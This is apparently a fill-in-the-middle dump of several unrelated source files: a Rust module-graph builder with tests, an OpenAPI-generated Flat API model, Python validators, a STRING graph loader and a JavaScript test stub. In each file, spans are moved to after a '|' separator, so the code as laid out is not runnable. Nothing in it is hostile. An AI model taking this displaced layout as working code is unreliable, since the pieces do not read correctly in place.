.into(),
);
};
if !self.contains_module(&resolved_specifier) {
return Err(
GraphError::MissingDependency(
referrer.to_owned(),
resolved_specifier.to_string(),
)
.into(),
);
}
let dep_module = self.get_module(&resolved_specifier).unwrap();
// In the case that there is a X-TypeScript-Types or a triple-slash types,
// then the `maybe_types` specifier will be populated and we should use that
// instead.
let result = if prefer_types && dep_module.maybe_types.is_some() {
let (_, types) = dep_module.maybe_types.clone().unwrap();
// It is possible that `types` points to a redirected specifier, so we
// need to ensure it resolves to the final specifier in the graph.
self.resolve_specifier(&types).clone()
} else {
dep_module.specifier.clone()
};
Ok(result)
}
/// Takes a module specifier and returns the "final" specifier, accounting for
/// any redirects that may have occurred.
fn resolve_specifier<'a>(
&'a self,
specifier: &'a ModuleSpecifier,
) -> &'a ModuleSpecifier {
let mut s = specifier;
let mut seen = HashSet::new();
seen.insert(s.clone());
while let Some(redirect) = self.redirects.get(s) {
if !seen.insert(redirect.clone()) {
eprintln!("An infinite loop of module redirections detected.\n Original specifier: {}", specifier);
break;
}
s = redirect;
if seen.len() > 5 {
eprintln!("An excessive number of module redirections detected.\n Original specifier: {}", specifier);
break;
}
}
s
}
/// Transpile (only transform) the graph, updating any emitted modules
/// with the specifier handler. The result contains any performance stats
/// from the compiler and optionally any user provided configuration compiler
/// options that were ignored.
///
/// # Arguments
///
/// * `options` - A structure of options which impact how the code is
/// transpiled.
///
pub fn transpile(
&mut self,
options: TranspileOptions,
) -> Result<(Stats, Option<IgnoredCompilerOptions>), AnyError> {
let start = Instant::now();
let mut ts_config = TsConfig::new(json!({
"checkJs": false,
"emitDecoratorMetadata": false,
"inlineSourceMap": true,
"jsx": "react",
"jsxFactory": "React.createElement",
"jsxFragmentFactory": "React.Fragment",
}));
let maybe_ignored_options =
ts_config.merge_tsconfig(options.maybe_config_path)?;
let emit_options: ast::EmitOptions = ts_config.clone().into();
let mut emit_count: u128 = 0;
let config = ts_config.as_bytes();
for (_, module) in self.modules.iter_mut() {
// TODO(kitsonk) a lot of this logic should be refactored into `Module` as
// we start to support other methods on the graph. Especially managing
// the dirty state is something the module itself should "own".
// if the module is a Dts file we should skip it
if module.media_type == MediaType::Dts {
continue;
}
// if we don't have check_js enabled, we won't touch non TypeScript
// modules
if !(emit_options.check_js
|| module.media_type == MediaType::TSX
|| module.media_type == MediaType::TypeScript)
{
continue;
}
// skip modules that already have a valid emit
if !options.reload && module.is_emit_valid(&config) {
continue;
}
if module.maybe_parsed_module.is_none() {
module.parse()?;
}
let parsed_module = module.maybe_parsed_module.clone().unwrap();
let emit = parsed_module.transpile(&emit_options)?;
emit_count += 1;
module.maybe_emit = Some(Emit::Cli(emit));
module.set_version(&config);
module.is_dirty = true;
}
self.flush()?;
let stats = Stats(vec![
("Files".to_string(), self.modules.len() as u128),
("Emitted".to_string(), emit_count),
("Total time".to_string(), start.elapsed().as_millis()),
]);
Ok((stats, maybe_ignored_options))
}
}
impl swc_bundler::Resolve for Graph2 {
fn resolve(
&self,
referrer: &swc_common::FileName,
specifier: &str,
) -> Result<swc_common::FileName, AnyError> {
let referrer = if let swc_common::FileName::Custom(referrer) = referrer {
ModuleSpecifier::resolve_url_or_path(referrer)
.context("Cannot resolve swc FileName to a module specifier")?
} else {
unreachable!(
"An unexpected referrer was passed when bundling: {:?}",
referrer
)
};
let specifier = self.resolve(specifier, &referrer, false)?;
Ok(swc_common::FileName::Custom(specifier.to_string()))
}
}
/// A structure for building a dependency graph of modules.
pub struct GraphBuilder2 {
fetched: HashSet<ModuleSpecifier>,
graph: Graph2,
maybe_import_map: Option<Rc<RefCell<ImportMap>>>,
pending: FuturesUnordered<FetchFuture>,
}
impl GraphBuilder2 {
pub fn new(
handler: Rc<RefCell<dyn SpecifierHandler>>,
maybe_import_map: Option<ImportMap>,
maybe_lockfile: Option<Arc<Mutex<Lockfile>>>,
) -> Self {
let internal_import_map = if let Some(import_map) = maybe_import_map {
Some(Rc::new(RefCell::new(import_map)))
} else {
None
};
GraphBuilder2 {
graph: Graph2::new(handler, maybe_lockfile),
fetched: HashSet::new(),
maybe_import_map: internal_import_map,
pending: FuturesUnordered::new(),
}
}
/// Add a module into the graph based on a module specifier. The module
/// and any dependencies will be fetched from the handler. The module will
/// also be treated as a _root_ module in the graph.
pub async fn add(
&mut self,
specifier: &ModuleSpecifier,
is_dynamic: bool,
) -> Result<(), AnyError> {
self.fetch(specifier, &None, is_dynamic)?;
loop {
let cached_module = self.pending.next().await.unwrap()?;
let is_root = &cached_module.specifier == specifier;
self.visit(cached_module, is_root)?;
if self.pending.is_empty() {
break;
}
}
if !self.graph.roots.contains(specifier) {
self.graph.roots.push(specifier.clone());
self.graph.roots_dynamic = self.graph.roots_dynamic && is_dynamic;
if self.graph.maybe_tsbuildinfo.is_none() {
let handler = self.graph.handler.borrow();
self.graph.maybe_tsbuildinfo = handler.get_tsbuildinfo(specifier)?;
}
}
Ok(())
}
/// Request a module to be fetched from the handler and queue up its future
/// to be awaited to be resolved.
fn fetch(
&mut self,
specifier: &ModuleSpecifier,
maybe_referrer: &Option<Location>,
is_dynamic: bool,
) -> Result<(), AnyError> {
if self.fetched.contains(&specifier) {
return Ok(());
}
self.fetched.insert(specifier.clone());
let future = self.graph.handler.borrow_mut().fetch(
specifier.clone(),
maybe_referrer.clone(),
is_dynamic,
);
self.pending.push(future);
Ok(())
}
/// Visit a module that has been fetched, hydrating the module, analyzing its
/// dependencies if required, fetching those dependencies, and inserting the
/// module into the graph.
fn visit(
&mut self,
cached_module: CachedModule,
is_root: bool,
) -> Result<(), AnyError> {
let specifier = cached_module.specifier.clone();
let requested_specifier = cached_module.requested_specifier.clone();
let mut module =
Module::new(cached_module, is_root, self.maybe_import_map.clone());
match module.media_type {
MediaType::Json
| MediaType::SourceMap
| MediaType::TsBuildInfo
| MediaType::Unknown => {
return Err(
GraphError::UnsupportedImportType(
module.specifier,
module.media_type,
)
.into(),
);
}
_ => (),
}
if !module.is_parsed {
let has_types = module.maybe_types.is_some();
module.parse()?;
if self.maybe_import_map.is_none() {
let mut handler = self.graph.handler.borrow_mut();
handler.set_deps(&specifier, module.dependencies.clone())?;
if !has_types {
if let Some((types, _)) = module.maybe_types.clone() {
handler.set_types(&specifier, types)?;
}
}
}
}
for (_, dep) in module.dependencies.iter() {
let maybe_referrer = Some(dep.location.clone());
if let Some(specifier) = dep.maybe_code.as_ref() {
self.fetch(specifier, &maybe_referrer, dep.is_dynamic)?;
}
if let Some(specifier) = dep.maybe_type.as_ref() {
self.fetch(specifier, &maybe_referrer, dep.is_dynamic)?;
}
}
if let Some((_, specifier)) = module.maybe_types.as_ref() {
self.fetch(specifier, &None, false)?;
}
if specifier != requested_specifier {
self
.graph
.redirects
.insert(requested_specifier, specifier.clone());
}
self.graph.modules.insert(specifier, module);
Ok(())
}
/// Move out the graph from the builder to be utilized further. An optional
/// lockfile can be provided, where if the sources in the graph do not match
/// the expected lockfile, an error will be logged and the process will exit.
pub fn get_graph(self) -> Graph2 {
self.graph.lock();
self.graph
}
}
#[cfg(test)]
pub mod tests {
use super::*;
use crate::specifier_handler::MemoryHandler;
use deno_core::futures::future;
use std::env;
use std::fs;
use std::path::PathBuf;
use std::sync::Mutex;
macro_rules! map (
{ $($key:expr => $value:expr),+ } => {
{
let mut m = ::std::collections::HashMap::new();
$(
m.insert($key, $value);
)+
m
}
};
);
/// This is a testing mock for `SpecifierHandler` that uses a special file
/// system renaming to mock local and remote modules as well as provides
/// "spies" for the critical methods for testing purposes.
#[derive(Debug, Default)]
pub struct MockSpecifierHandler {
pub fixtures: PathBuf,
pub maybe_tsbuildinfo: Option<String>,
pub tsbuildinfo_calls: Vec<(ModuleSpecifier, String)>,
pub cache_calls: Vec<(ModuleSpecifier, Emit)>,
pub deps_calls: Vec<(ModuleSpecifier, DependencyMap)>,
pub types_calls: Vec<(ModuleSpecifier, String)>,
pub version_calls: Vec<(ModuleSpecifier, String)>,
}
impl MockSpecifierHandler {
fn get_cache(
&self,
specifier: ModuleSpecifier,
) -> Result<CachedModule, AnyError> {
let specifier_text = specifier
.to_string()
.replace(":///", "_")
.replace("://", "_")
.replace("/", "-");
let source_path = self.fixtures.join(specifier_text);
let media_type = MediaType::from(&source_path);
let source = fs::read_to_string(&source_path)?;
let is_remote = specifier.as_url().scheme() != "file";
Ok(CachedModule {
source,
requested_specifier: specifier.clone(),
source_path,
specifier,
media_type,
is_remote,
..CachedModule::default()
})
}
}
impl SpecifierHandler for MockSpecifierHandler {
fn fetch(
&mut self,
specifier: ModuleSpecifier,
_maybe_referrer: Option<Location>,
_is_dynamic: bool,
) -> FetchFuture {
Box::pin(future::ready(self.get_cache(specifier)))
}
fn get_tsbuildinfo(
&self,
_specifier: &ModuleSpecifier,
) -> Result<Option<String>, AnyError> {
Ok(self.maybe_tsbuildinfo.clone())
}
fn set_cache(
&mut self,
specifier: &ModuleSpecifier,
emit: &Emit,
) -> Result<(), AnyError> {
self.cache_calls.push((specifier.clone(), emit.clone()));
Ok(())
}
fn set_types(
&mut self,
specifier: &ModuleSpecifier,
types: String,
) -> Result<(), AnyError> {
self.types_calls.push((specifier.clone(), types));
Ok(())
}
fn set_tsbuildinfo(
&mut self,
specifier: &ModuleSpecifier,
tsbuildinfo: String,
) -> Result<(), AnyError> {
self.maybe_tsbuildinfo = Some(tsbuildinfo.clone());
self
.tsbuildinfo_calls
.push((specifier.clone(), tsbuildinfo));
Ok(())
}
fn set_deps(
&mut self,
specifier: &ModuleSpecifier,
dependencies: DependencyMap,
) -> Result<(), AnyError> {
self.deps_calls.push((specifier.clone(), dependencies));
Ok(())
}
fn set_version(
&mut self,
specifier: &ModuleSpecifier,
version: String,
) -> Result<(), AnyError> |
}
async fn setup(
specifier: ModuleSpecifier,
) -> (Graph2, Rc<RefCell<MockSpecifierHandler>>) {
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/module_graph");
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures,
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect("module not inserted");
(builder.get_graph(), handler)
}
async fn setup_memory(
specifier: ModuleSpecifier,
sources: HashMap<&str, &str>,
) -> Graph2 {
let sources: HashMap<String, String> = sources
.iter()
.map(|(k, v)| (k.to_string(), v.to_string()))
.collect();
let handler = Rc::new(RefCell::new(MemoryHandler::new(sources)));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect("module not inserted");
builder.get_graph()
}
#[test]
fn test_get_version() {
let doc_a = "console.log(42);";
let version_a = get_version(&doc_a, "1.2.3", b"");
let doc_b = "console.log(42);";
let version_b = get_version(&doc_b, "1.2.3", b"");
assert_eq!(version_a, version_b);
let version_c = get_version(&doc_a, "1.2.3", b"options");
assert_ne!(version_a, version_c);
let version_d = get_version(&doc_b, "1.2.3", b"options");
assert_eq!(version_c, version_d);
let version_e = get_version(&doc_a, "1.2.4", b"");
assert_ne!(version_a, version_e);
let version_f = get_version(&doc_b, "1.2.4", b"");
assert_eq!(version_e, version_f);
}
#[test]
fn test_module_emit_valid() {
let source = "console.log(42);".to_string();
let maybe_version = Some(get_version(&source, version::DENO, b""));
let module = Module {
source,
maybe_version,
..Module::default()
};
assert!(module.is_emit_valid(b""));
let source = "console.log(42);".to_string();
let old_source = "console.log(43);";
let maybe_version = Some(get_version(old_source, version::DENO, b""));
let module = Module {
source,
maybe_version,
..Module::default()
};
assert!(!module.is_emit_valid(b""));
let source = "console.log(42);".to_string();
let maybe_version = Some(get_version(&source, "0.0.0", b""));
let module = Module {
source,
maybe_version,
..Module::default()
};
assert!(!module.is_emit_valid(b""));
let source = "console.log(42);".to_string();
let module = Module {
source,
..Module::default()
};
assert!(!module.is_emit_valid(b""));
}
#[test]
fn test_module_set_version() {
let source = "console.log(42);".to_string();
let expected = Some(get_version(&source, version::DENO, b""));
let mut module = Module {
source,
..Module::default()
};
assert!(module.maybe_version.is_none());
module.set_version(b"");
assert_eq!(module.maybe_version, expected);
}
#[tokio::test]
async fn test_graph_bundle() {
let tests = vec![
("file:///tests/fixture01.ts", "fixture01.out"),
("file:///tests/fixture02.ts", "fixture02.out"),
("file:///tests/fixture03.ts", "fixture03.out"),
("file:///tests/fixture04.ts", "fixture04.out"),
("file:///tests/fixture05.ts", "fixture05.out"),
("file:///tests/fixture06.ts", "fixture06.out"),
("file:///tests/fixture07.ts", "fixture07.out"),
("file:///tests/fixture08.ts", "fixture08.out"),
("file:///tests/fixture09.ts", "fixture09.out"),
("file:///tests/fixture10.ts", "fixture10.out"),
("file:///tests/fixture11.ts", "fixture11.out"),
("file:///tests/fixture12.ts", "fixture12.out"),
("file:///tests/fixture13.ts", "fixture13.out"),
("file:///tests/fixture14.ts", "fixture14.out"),
];
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/bundle");
for (specifier, expected_str) in tests {
let specifier = ModuleSpecifier::resolve_url_or_path(specifier).unwrap();
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures: fixtures.clone(),
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect("module not inserted");
let graph = builder.get_graph();
let (actual, stats, maybe_ignored_options) = graph
.bundle(BundleOptions::default())
.expect("could not bundle");
assert_eq!(stats.0.len(), 2);
assert_eq!(maybe_ignored_options, None);
let expected_path = fixtures.join(expected_str);
let expected = fs::read_to_string(expected_path).unwrap();
assert_eq!(actual, expected, "fixture: {}", specifier);
}
}
#[tokio::test]
async fn test_graph_check_emit() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (graph, handler) = setup(specifier).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: true,
lib: TypeLib::DenoWindow,
maybe_config_path: None,
reload: false,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(result_info.stats.0.len(), 12);
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 2);
assert_eq!(h.tsbuildinfo_calls.len(), 1);
}
#[tokio::test]
async fn test_graph_check_no_emit() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (graph, handler) = setup(specifier).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: false,
lib: TypeLib::DenoWindow,
maybe_config_path: None,
reload: false,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(result_info.stats.0.len(), 12);
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 0);
assert_eq!(h.tsbuildinfo_calls.len(), 1);
}
#[tokio::test]
async fn test_graph_check_user_config() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/checkwithconfig.ts")
.expect("could not resolve module");
let (graph, handler) = setup(specifier.clone()).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: true,
lib: TypeLib::DenoWindow,
maybe_config_path: Some(
"tests/module_graph/tsconfig_01.json".to_string(),
),
reload: true,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.version_calls.len(), 2);
let ver0 = h.version_calls[0].1.clone();
let ver1 = h.version_calls[1].1.clone();
// let's do it all over again to ensure that the versions are determinstic
let (graph, handler) = setup(specifier).await;
let result_info = graph
.check(CheckOptions {
debug: false,
emit: true,
lib: TypeLib::DenoWindow,
maybe_config_path: Some(
"tests/module_graph/tsconfig_01.json".to_string(),
),
reload: true,
})
.expect("should have checked");
assert!(result_info.maybe_ignored_options.is_none());
assert!(result_info.diagnostics.is_empty());
let h = handler.borrow();
assert_eq!(h.version_calls.len(), 2);
assert!(h.version_calls[0].1 == ver0 || h.version_calls[0].1 == ver1);
assert!(h.version_calls[1].1 == ver0 || h.version_calls[1].1 == ver1);
}
#[tokio::test]
async fn test_graph_emit() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///a.ts").unwrap();
let graph = setup_memory(
specifier,
map!(
"/a.ts" => r#"
import * as b from "./b.ts";
console.log(b);
"#,
"/b.ts" => r#"
export const b = "b";
"#
),
)
.await;
let (emitted_files, result_info) = graph
.emit(EmitOptions {
bundle_type: BundleType::None,
debug: false,
maybe_user_config: None,
})
.expect("should have emitted");
assert!(result_info.diagnostics.is_empty());
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(emitted_files.len(), 4);
let out_a = emitted_files.get("file:///a.ts.js");
assert!(out_a.is_some());
let out_a = out_a.unwrap();
assert!(out_a.starts_with("import * as b from"));
assert!(emitted_files.contains_key("file:///a.ts.js.map"));
let out_b = emitted_files.get("file:///b.ts.js");
assert!(out_b.is_some());
let out_b = out_b.unwrap();
assert!(out_b.starts_with("export const b = \"b\";"));
assert!(emitted_files.contains_key("file:///b.ts.js.map"));
}
#[tokio::test]
async fn test_graph_emit_bundle() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///a.ts").unwrap();
let graph = setup_memory(
specifier,
map!(
"/a.ts" => r#"
import * as b from "./b.ts";
console.log(b);
"#,
"/b.ts" => r#"
export const b = "b";
"#
),
)
.await;
let (emitted_files, result_info) = graph
.emit(EmitOptions {
bundle_type: BundleType::Esm,
debug: false,
maybe_user_config: None,
})
.expect("should have emitted");
assert!(result_info.diagnostics.is_empty());
assert!(result_info.maybe_ignored_options.is_none());
assert_eq!(emitted_files.len(), 1);
let actual = emitted_files.get("deno:///bundle.js");
assert!(actual.is_some());
let actual = actual.unwrap();
assert!(actual.contains("const b = \"b\";"));
assert!(actual.contains("console.log(b);"));
}
#[tokio::test]
async fn test_graph_info() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (graph, _) = setup(specifier).await;
let info = graph.info().expect("could not get info");
assert!(info.compiled.is_none());
assert_eq!(info.dep_count, 6);
assert_eq!(info.file_type, MediaType::TypeScript);
assert_eq!(info.files.0.len(), 7);
assert!(info.local.to_string_lossy().ends_with("file_tests-main.ts"));
assert!(info.map.is_none());
assert_eq!(
info.module,
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts").unwrap()
);
assert_eq!(info.total_size, 344);
}
#[tokio::test]
async fn test_graph_import_json() {
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/importjson.ts")
.expect("could not resolve module");
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/module_graph");
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures,
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect_err("should have errored");
}
#[tokio::test]
async fn test_graph_transpile() {
// This is a complex scenario of transpiling, where we have TypeScript
// importing a JavaScript file (with type definitions) which imports
// TypeScript, JavaScript, and JavaScript with type definitions.
// For scenarios where we transpile, we only want the TypeScript files
// to be actually emitted.
//
// This also exercises "@deno-types" and type references.
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
let (mut graph, handler) = setup(specifier).await;
let (stats, maybe_ignored_options) =
graph.transpile(TranspileOptions::default()).unwrap();
assert_eq!(stats.0.len(), 3);
assert_eq!(maybe_ignored_options, None);
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 2);
match &h.cache_calls[0].1 {
Emit::Cli((code, maybe_map)) => {
assert!(
code.contains("# sourceMappingURL=data:application/json;base64,")
);
assert!(maybe_map.is_none());
}
};
match &h.cache_calls[1].1 {
Emit::Cli((code, maybe_map)) => {
assert!(
code.contains("# sourceMappingURL=data:application/json;base64,")
);
assert!(maybe_map.is_none());
}
};
assert_eq!(h.deps_calls.len(), 7);
assert_eq!(
h.deps_calls[0].0,
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts").unwrap()
);
assert_eq!(h.deps_calls[0].1.len(), 1);
assert_eq!(
h.deps_calls[1].0,
ModuleSpecifier::resolve_url_or_path("https://deno.land/x/lib/mod.js")
.unwrap()
);
assert_eq!(h.deps_calls[1].1.len(), 3);
assert_eq!(
h.deps_calls[2].0,
ModuleSpecifier::resolve_url_or_path("https://deno.land/x/lib/mod.d.ts")
.unwrap()
);
assert_eq!(h.deps_calls[2].1.len(), 3, "should have 3 dependencies");
// sometimes the calls are not deterministic, and so checking the contents
// can cause some failures
assert_eq!(h.deps_calls[3].1.len(), 0, "should have no dependencies");
assert_eq!(h.deps_calls[4].1.len(), 0, "should have no dependencies");
assert_eq!(h.deps_calls[5].1.len(), 0, "should have no dependencies");
assert_eq!(h.deps_calls[6].1.len(), 0, "should have no dependencies");
}
#[tokio::test]
async fn test_graph_transpile_user_config() {
let specifier =
ModuleSpecifier::resolve_url_or_path("https://deno.land/x/transpile.tsx")
.expect("could not resolve module");
let (mut graph, handler) = setup(specifier).await;
let (_, maybe_ignored_options) = graph
.transpile(TranspileOptions {
debug: false,
maybe_config_path: Some("tests/module_graph/tsconfig.json".to_string()),
reload: false,
})
.unwrap();
assert_eq!(
maybe_ignored_options.unwrap().items,
vec!["target".to_string()],
"the 'target' options should have been ignored"
);
let h = handler.borrow();
assert_eq!(h.cache_calls.len(), 1, "only one file should be emitted");
// FIXME(bartlomieju): had to add space in `<div>`, probably a quirk in swc_ecma_codegen
match &h.cache_calls[0].1 {
Emit::Cli((code, _)) => {
assert!(
code.contains("<div >Hello world!</div>"),
"jsx should have been preserved"
);
}
}
}
#[tokio::test]
async fn test_graph_with_lockfile() {
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/module_graph");
let lockfile_path = fixtures.join("lockfile.json");
let lockfile =
Lockfile::new(lockfile_path, false).expect("could not load lockfile");
let maybe_lockfile = Some(Arc::new(Mutex::new(lockfile)));
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures,
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, maybe_lockfile);
let specifier =
ModuleSpecifier::resolve_url_or_path("file:///tests/main.ts")
.expect("could not resolve module");
builder
.add(&specifier, false)
.await
.expect("module not inserted");
builder.get_graph();
}
}
| {
self.version_calls.push((specifier.clone(), version));
Ok(())
} |
app.py | def launch():
print('This is the launch method!') | ||
collection_type.py | # coding: utf-8
"""
Flat API
The Flat API allows you to easily extend the abilities of the [Flat Platform](https://flat.io), with a wide range of use cases including the following: * Creating and importing new music scores using MusicXML, MIDI, Guitar Pro (GP3, GP4, GP5, GPX, GP), PowerTab, TuxGuitar and MuseScore files * Browsing, updating, copying, exporting the user's scores (for example in MP3, WAV or MIDI) * Managing educational resources with Flat for Education: creating & updating the organization accounts, the classes, rosters and assignments. The Flat API is built on HTTP. Our API is RESTful It has predictable resource URLs. It returns HTTP response codes to indicate errors. It also accepts and returns JSON in the HTTP body. The [schema](/swagger.yaml) of this API follows the [OpenAPI Initiative (OAI) specification](https://www.openapis.org/), you can use and work with [compatible Swagger tools](http://swagger.io/open-source-integrations/). This API features Cross-Origin Resource Sharing (CORS) implemented in compliance with [W3C spec](https://www.w3.org/TR/cors/). You can use your favorite HTTP/REST library for your programming language to use Flat's API. This specification and reference is [available on Github](https://github.com/FlatIO/api-reference). Getting Started and learn more: * [API Overview and interoduction](https://flat.io/developers/docs/api/) * [Authentication (Personal Access Tokens or OAuth2)](https://flat.io/developers/docs/api/authentication.html) * [SDKs](https://flat.io/developers/docs/api/sdks.html) * [Rate Limits](https://flat.io/developers/docs/api/rate-limits.html) * [Changelog](https://flat.io/developers/docs/api/changelog.html) # noqa: E501
OpenAPI spec version: 2.7.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class CollectionType(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
allowed enum values
"""
ROOT = "root"
REGULAR = "regular"
SHAREDWITHME = "sharedWithMe"
SHAREDWITHGROUP = "sharedWithGroup"
TRASH = "trash"
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
}
attribute_map = {
}
def __init__(self): # noqa: E501
"""CollectionType - a model defined in OpenAPI""" # noqa: E501
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
|
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| """Returns true if both objects are equal"""
if not isinstance(other, CollectionType):
return False
return self.__dict__ == other.__dict__ |
validators.py | from dictization_functions import missing, StopOnError, Invalid
from pylons.i18n import _
def identity_converter(key, data, errors, context):
return
def keep_extras(key, data, errors, context):
extras = data.pop(key, {})
for extras_key, value in extras.iteritems():
data[key[:-1] + (extras_key,)] = value
def not_missing(key, data, errors, context):
value = data.get(key)
if value is missing:
errors[key].append(_('Missing value'))
raise StopOnError
def not_empty(key, data, errors, context):
value = data.get(key)
if not value or value is missing:
errors[key].append(_('Missing value'))
raise StopOnError
def if_empty_same_as(other_key):
def callable(key, data, errors, context):
value = data.get(key)
if not value or value is missing:
data[key] = data[key[:-1] + (other_key,)]
return callable
def both_not_empty(other_key):
def callable(key, data, errors, context):
value = data.get(key)
other_value = data.get(key[:-1] + (other_key,))
if (not value or value is missing and
not other_value or other_value is missing):
errors[key].append(_('Missing value'))
raise StopOnError
return callable
def empty(key, data, errors, context):
value = data.pop(key, None)
if value and value is not missing:
errors[key].append(_(
'The input field %(name)s was not expected.') % {"name": key[-1]})
def ignore(key, data, errors, context):
|
def default(defalult_value):
def callable(key, data, errors, context):
value = data.get(key)
if not value or value is missing:
data[key] = defalult_value
return callable
def ignore_missing(key, data, errors, context):
value = data.get(key)
if value is missing or value is None:
data.pop(key, None)
raise StopOnError
def ignore_empty(key, data, errors, context):
value = data.get(key)
if value is missing or not value:
data.pop(key, None)
raise StopOnError
def convert_int(value, context):
try:
return int(value)
except ValueError:
raise Invalid(_('Please enter an integer value'))
| value = data.pop(key, None)
raise StopOnError |
candidatussericytochromatiabacteriums15bmn24raac196.py | """
This file offers the methods to automatically retrieve the graph Candidatus Sericytochromatia bacterium S15B-MN24 RAAC_196.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def | (
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Candidatus Sericytochromatia bacterium S15B-MN24 RAAC_196 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Candidatus Sericytochromatia bacterium S15B-MN24 RAAC_196 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="CandidatusSericytochromatiaBacteriumS15bMn24Raac196",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| CandidatusSericytochromatiaBacteriumS15bMn24Raac196 |
testReport1.js | (function($) {
module("report1");
// Test case : Report 1
_asyncTest("report1", function()
{
expect(2);
GitanaTest.authenticateNewTenant(function() {
// NOTE: this = platform
var platform = this;
this.createReport({
"tag": "a"
});
